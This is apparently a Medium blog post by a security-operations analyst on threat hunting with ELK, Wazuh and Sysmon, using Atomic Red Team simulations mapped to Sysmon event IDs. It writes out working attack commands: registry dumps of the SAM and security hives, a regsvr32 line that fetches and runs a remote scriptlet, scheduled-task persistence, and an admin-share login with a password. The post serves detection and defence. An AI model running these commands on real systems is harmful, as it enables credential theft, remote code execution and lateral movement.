Threat Hunting with ELK + Wazuh

Catch me if you can :)
Catch Me If You Can :)
  1. ELK
  2. Wazuh
  3. Sysmon — (config file: sysmon-modular)
  4. Atomic Red Team (ART)
  1. T1003 — Credential Dumping
  2. T1037 — Logon Scripts && T1053 Scheduled Task
  3. T1018 — Remote Host Discovery && T1077 — Windows Admin Shares
  4. T1117 — Regsvr32
  1. T1003 — Credential Dumping
  • SAM
  • LSA Secrets
  • Lsass.exe process memory
  • Service Principle Names (SPN)
  • Cached Credentials
  • Registry files
  • Mimikatz
  • gsecdump
  • Secretdump
  • Windows Credential editor
  • Metasploit modules
  • Powersploit
  • Empire
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
T1003 — Registry dump of SAM, creds, and secrets
Sysmon Events
Sysmon Event ID 1
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
T1117 — Regsvr32
Sysmon Events
Sysmon Event ID 1
Sysmon Event ID 3
Sysmon Event ID 7
schtasks /create /tn “T1037_OnLogon” /sc onlogon /tr “cmd.exe /c calc.exe”schtasks /create /tn “T1037_OnStartup” /sc onstart /ru system /tr “cmd.exe /c calc.exe”
T1037 — Logon Script && T1053 Scheduled Task
Sysmon Events
Sysmon Event ID 1
cmd.exe /c “net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator”
T1077 — Windows Admin Shares
Sysmon Events
Sysmon Event ID 1

--

--

--

Incident Handler, Security Operations

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Optimism loses 20M tokens after L1 and L2 confusion exploited

Chaining attack vectors to pwn a company.

FudmartSwap Exchange Beta Version is LIVE

PhotoDNA: Detecting Child Abuse

{UPDATE} Cooking Crazy Burger Hack Free Resources Generator

The methodology of ensuring the security of ES Bridge with frequent attack from hackers by adopting…

PERI Finance Staking dApp Bug Bounty Program

{UPDATE} Horizon GT Racing Challenge Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Abhijith Rao

Abhijith Rao

Incident Handler, Security Operations

More from Medium

How to mirror traffic from your servers to Security Onion for Threat Hunting

Operationalizing MITRE Engage: Deception Opportunities with APT Cyber Tools Targeting ICS/SCADA…

Installation Method of OpenVAS

Splunk Enterprise — Q&A — Fields